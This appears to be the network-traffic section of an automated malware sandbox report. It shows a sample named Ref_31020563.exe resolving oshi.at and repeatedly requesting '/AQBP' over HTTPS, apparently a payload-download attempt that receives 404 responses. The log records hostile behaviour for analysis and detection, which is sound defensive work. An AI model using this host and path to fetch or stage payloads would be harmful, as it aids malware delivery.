                                          Dec 10, 2024 16:30:02.081031084 CET44349770194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:04.145190954 CET44349770194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:04.147108078 CET49770443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:04.147123098 CET44349770194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:04.971393108 CET44349770194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:04.971415043 CET44349770194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:04.971482038 CET44349770194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:04.971560955 CET49770443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:04.971592903 CET49770443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:04.972356081 CET49770443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:04.972929001 CET49771443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:04.972963095 CET44349771194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:04.974771976 CET49771443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:04.974971056 CET49771443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:04.974987030 CET44349771194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:07.043699026 CET44349771194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:07.045408010 CET49771443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:07.045423985 CET44349771194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:08.144686937 CET44349771194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:08.144711018 CET44349771194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:08.144793034 CET44349771194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:08.144840956 CET49771443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:08.144879103 CET49771443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:08.145569086 CET49771443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:08.146150112 CET49772443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:08.146207094 CET44349772194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:08.146295071 CET49772443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:08.146562099 CET49772443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:08.146586895 CET44349772194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:10.229820013 CET44349772194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:10.231950045 CET49772443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:10.231971025 CET44349772194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:10.962615013 CET44349772194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:10.962637901 CET44349772194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:10.962701082 CET44349772194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:10.962743998 CET49772443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:10.962796926 CET49772443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:10.966707945 CET49772443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:10.967327118 CET49773443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:10.967390060 CET44349773194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:10.967448950 CET49773443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:10.967674017 CET49773443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:10.967689991 CET44349773194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:13.038268089 CET44349773194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:13.046117067 CET49773443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:13.046159029 CET44349773194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:13.861282110 CET44349773194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:13.861299992 CET44349773194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:13.861370087 CET49773443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:13.861375093 CET44349773194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:13.861424923 CET49773443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:13.862008095 CET49773443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:13.862699032 CET49774443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:13.862737894 CET44349774194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:13.862806082 CET49774443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:13.863037109 CET49774443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:13.863049030 CET44349774194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:15.943689108 CET44349774194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:15.945337057 CET49774443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:15.945350885 CET44349774194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:16.740180969 CET44349774194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:16.740209103 CET44349774194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:16.740268946 CET49774443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:16.740273952 CET44349774194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:16.740313053 CET49774443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:16.740753889 CET49774443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:16.741317034 CET49775443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:16.741359949 CET44349775194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:16.741435051 CET49775443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:16.741632938 CET49775443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:16.741646051 CET44349775194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:18.850009918 CET44349775194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:18.851578951 CET49775443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:18.851623058 CET44349775194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:19.661657095 CET44349775194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:19.661688089 CET44349775194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:19.661767006 CET44349775194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:19.661799908 CET49775443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:19.661837101 CET49775443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:19.662323952 CET49775443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:19.662815094 CET49776443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:19.662863016 CET44349776194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:19.662929058 CET49776443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:19.663153887 CET49776443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:19.663168907 CET44349776194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:21.750158072 CET44349776194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:21.751805067 CET49776443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:21.751821041 CET44349776194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:22.805948973 CET44349776194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:22.805967093 CET44349776194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:22.806008101 CET49776443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:22.806022882 CET44349776194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:22.806046963 CET44349776194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:22.806082964 CET49776443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:22.806524992 CET49776443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:22.807068110 CET49777443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:22.807120085 CET44349777194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:22.807184935 CET49777443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:22.807394981 CET49777443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:22.807405949 CET44349777194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:24.887818098 CET44349777194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:24.889529943 CET49777443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:24.889561892 CET44349777194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:25.705406904 CET44349777194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:25.705430031 CET44349777194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:25.705504894 CET44349777194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:25.705538034 CET49777443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:25.705590963 CET49777443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:25.706258059 CET49777443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:25.706851006 CET49778443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:25.706897020 CET44349778194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:25.710937977 CET49778443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:25.711253881 CET49778443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:25.711266041 CET44349778194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:27.796731949 CET44349778194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:27.798222065 CET49778443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:27.798238039 CET44349778194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:28.588843107 CET44349778194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:28.588865995 CET44349778194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:28.588938951 CET44349778194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:28.589138031 CET49778443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:28.589690924 CET49778443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:28.590296030 CET49779443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:28.590344906 CET44349779194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:28.590651989 CET49779443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:28.590651989 CET49779443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:28.590682030 CET44349779194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:30.706397057 CET44349779194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:30.710566044 CET49779443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:30.710596085 CET44349779194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:31.493407965 CET44349779194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:31.493427038 CET44349779194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:31.493496895 CET44349779194.15.112.248192.168.2.8
                                          Dec 10, 2024 16:30:31.493541002 CET49779443192.168.2.8194.15.112.248
                                          Dec 10, 2024 16:30:31.493594885 CET49779443192.168.2.8194.15.112.248
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 10, 2024 16:27:23.357001066 CET | 56997 | 53 | 192.168.2.8 | 1.1.1.1
Dec 10, 2024 16:27:23.496228933 CET | 53 | 56997 | 1.1.1.1 | 192.168.2.8

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 10, 2024 16:27:23.357001066 CET | 192.168.2.8 | 1.1.1.1 | 0x8369 | Standard query (0) | oshi.at | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 10, 2024 16:27:23.496228933 CET | 1.1.1.1 | 192.168.2.8 | 0x8369 | No error (0) | oshi.at | | 194.15.112.248 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 16:27:23.496228933 CET | 1.1.1.1 | 192.168.2.8 | 0x8369 | No error (0) | oshi.at | | 5.253.86.15 | A (IP address) | IN (0x0001) | false
                                          • oshi.at
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49713 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:27:25 UTC | 61 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
Connection: Keep-Alive
2024-12-10 15:27:26 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:27:26 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:27:26 UTC | 1849 | IN
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49714 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:27:28 UTC | 37 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
2024-12-10 15:27:29 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:27:29 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:27:29 UTC | 1849 | IN
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49715 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:27:31 UTC | 37 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
2024-12-10 15:27:32 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:27:32 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:27:32 UTC | 1849 | IN
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49716 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:27:34 UTC | 37 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
2024-12-10 15:27:35 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:27:35 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:27:35 UTC | 1849 | IN
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49717 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:27:37 UTC | 37 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
2024-12-10 15:27:38 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:27:38 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:27:38 UTC | 1849 | IN
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49718 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:27:40 UTC | 37 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
2024-12-10 15:27:41 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:27:40 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:27:41 UTC | 1849 | IN
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49721 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-10 15:27:43 UTC | 37 | OUT | GET /AQBP HTTP/1.1
Host: oshi.at
2024-12-10 15:27:44 UTC | 158 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:27:43 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 1849
Connection: close
2024-12-10 15:27:44 UTC | 1849 | IN
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          7 | 192.168.2.8 | 49722 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:27:46 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:27:47 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:27:46 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:27:47 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          8 | 192.168.2.8 | 49723 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:27:49 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:27:49 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:27:49 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:27:49 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          9 | 192.168.2.8 | 49724 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:27:52 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:27:52 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:27:52 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:27:52 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          10 | 192.168.2.8 | 49725 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:27:55 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:27:55 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:27:55 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:27:55 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          11 | 192.168.2.8 | 49726 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:27:57 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:27:58 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:27:58 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:27:58 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          12 | 192.168.2.8 | 49727 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:28:00 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:01 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:01 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:01 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          13 | 192.168.2.8 | 49728 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:28:03 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:04 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:04 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:04 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          14 | 192.168.2.8 | 49729 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:28:06 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:07 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:07 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:07 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          15 | 192.168.2.8 | 49730 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:28:09 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:10 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:10 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:10 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          16 | 192.168.2.8 | 49731 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:28:12 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:13 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:12 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:13 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          17 | 192.168.2.8 | 49732 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:28:15 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:16 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:15 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:16 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          18 | 192.168.2.8 | 49733 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:28:18 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:19 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:18 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:19 UTC | 1849 | IN
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          19 | 192.168.2.8 | 49735 | 194.15.112.248 | 443 | 7572 | C:\Users\user\Desktop\Ref_31020563.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          2024-12-10 15:28:21 UTC | 37 | OUT | GET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:21 UTC | 158 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:21 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:21 UTC | 1849 | IN
